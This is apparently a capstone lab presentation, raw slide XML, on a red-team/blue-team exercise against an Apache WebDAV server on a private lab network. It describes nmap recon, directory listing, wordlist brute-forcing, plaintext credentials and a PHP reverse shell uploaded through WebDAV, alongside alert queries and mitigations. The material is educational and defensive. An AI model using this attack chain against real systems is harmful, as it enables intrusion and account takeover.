                </a:solidFill>
              </a:rPr>
              <a:t>http.responsestatus_phrase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for http.response.status_code: 401</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with the  low-level alert threshold of 5 hits and critical-level being 15 or more hits.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39" name="Google Shape;1239;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Setting up a lockout after multiple failed attempts would thwart attempts at a brute force.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Multi-factor authentication would prove useful if brute-forcing the password was successful.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>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Increase password strength requirements for the directory, and update policy required to change password every 3 months. </a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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5" name="Google Shape;124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Setup an alert for any connection/GET requests to WebDAV </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ttp.request.method: “GET”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url.path: /webdav/</a:t>
            </a:r>
            <a:br>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1247" name="Google Shape;1247;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Updating the WebDAV application so it is up to date.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Disabling WebDAV, and using a more secure application would be recommended course of action to reduce surface area for attackers. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Increase password strength requirements for the directory, and update policy required to change password every 3 months, to prevent unauthorized usage of the WebDAV application.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br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:b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3" name="Google Shape;125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4" name="Google Shape;1254;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Setup an alert for any files being uploaded to /WebDAV. The threshold being set to one or more PUT requests. Malicious file or not, it is safer to monitor any files being uploaded.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>http.request.method: “PUT”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>rl.path : /WebDAV</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55" name="Google Shape;1255;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Define file types that can be uploaded, restricting .php filetypes. The list of permitted extensions should be reviewed, as it can contain malicious extensions. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Uploaded directory should not have any “execute” permission, and all script handlers should be removed from these directories.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900">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Range: 192.168.1.0 to 192.168.1.255</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Gateway: 192.168.1.1</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900">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="9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sz="800"/>
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Hostname: Default Gateway</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IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>OS: Linux, Ubuntu 	</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Hostname: ELK</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IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>OS: Linux, Ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Hostname: Capstone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IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux; Kali, Debian </a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>Hostname: Kali</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t/>
            </a:r>
            <a:endParaRPr sz="800"/>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542662" y="985412"/>
            <a:ext cx="3589417" cy="363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300"/>
              <a:t>Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>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sz="1700">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>identified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr sz="1700">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{3B69DC15-854B-4F02-B7BB-668EF089523C}</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557775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Default Gateway</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>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rgbClr val="202124"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Router that connects your host to remote network segments</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rgbClr val="202124"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>A platform that collects and processes data from multiple data sources, stores that data in one centralized data store that can scale as data grows, and that provides a set of tools to analyze the data</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The vulnerable machine</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Linux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The attacking machine</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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1083" name="Google Shape;1083;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="319900" y="1135420"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3B69DC15-854B-4F02-B7BB-668EF089523C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2310150"/>
                <a:gridCol w="3030975"/>
                <a:gridCol w="3168625"/>
              </a:tblGrid>
              <a:tr h="265475">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Vulnerability</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Description</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Impact</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53950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>CWE-548: Exposure of Information Through Directory Listing</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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t>Directory listing is a web server function that displays the directory contents when there is no index file in a specific website directory. </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It is dangerous to leave this function turned on for the web server because it leads to information disclosure. </a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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88150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>CWE-521: Weak Password Requirements</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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t>Short, common, a system default, or something that could be rapidly guessed by executing a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000"/>
                        <a:t>brute force</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000"/>
                        <a:t> attack using a subset of all possible passwords.</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rgbClr val="202124"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>An attacker can take over a user's account and potentially access sensitive data in the application. (Ashton’s password can be broken into with a simple wordlist.)</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02775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>CWE-256: Unprotected Storage of Credentials</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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t>Storing a password in plaintext may result in a system compromise.</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t>Storing a plaintext password in a document allows anyone who can read the file, access to the password protected resource. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000"/>
                        <a:t>(Ryan’s hashed password in Ashton’s secret folder.)</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30100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>CWE-312: Cleartext Storage of Sensitive Information</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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t>The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere. </a:t>
                      </a:r>
                      <a:endParaRPr sz="10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t>Because the information is stored in cleartext, attackers could potentially read it, even if the information is encoded in a way that is not human-readable.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reference to a hidden directory containing sensitive data, hashed passwords.)</a:t>
                      </a:r>
                      <a:endParaRPr sz="800"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1090" name="Google Shape;1090;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="308000" y="796045"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3B69DC15-854B-4F02-B7BB-668EF089523C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2325925"/>
                <a:gridCol w="3074000"/>
                <a:gridCol w="3121725"/>
              </a:tblGrid>
              <a:tr h="413925">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Vulnerability</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Description</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Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="13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15100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Simple Usernames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Using simple user credentials makes it easy to guess the account or user names.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With the user of simple usernames, we were able to guess the username required for brute forcing with a wordlist.</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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35100">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CWE-434: Unrestricted Upload of File with Dangerous Type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The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.</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WebDAV allows us to upload files, a malicious PHP script in our case, to their web server.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89300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Remote Code Execution;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>PHP Reverse Shell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Reverse shell is mechanism that allow you to have the server shell by exploiting the web server to trigger a connection back.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The attacker would be able to take full control over the web server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300"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Exposure of Information Through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097" name="Google Shape;109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8" name="Google Shape;1098;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>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We use nmap to look for machines within the company’s subnet. By doing this we discover the IP addresses of the machines, as well as the Operating System and versions of the services the machine’s were using. Running a script to check for vulnerabilities, shows Root directory w/ listing on ‘apache/2.4.29’.</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br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1101" name="Google Shape;110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2" name="Google Shape;110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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1104" name="Google Shape;110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5" name="Google Shape;110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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5905481" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1108" name="Google Shape;110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3</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1109" name="Google Shape;110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Using nmap, we found that there was a machine (Capstone) that was running Apache, with Port 22 open for ssh. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This leads us to checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> which gave us a Directory Listing. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Perusing the directories, we found sensitive information and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>credentials in plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
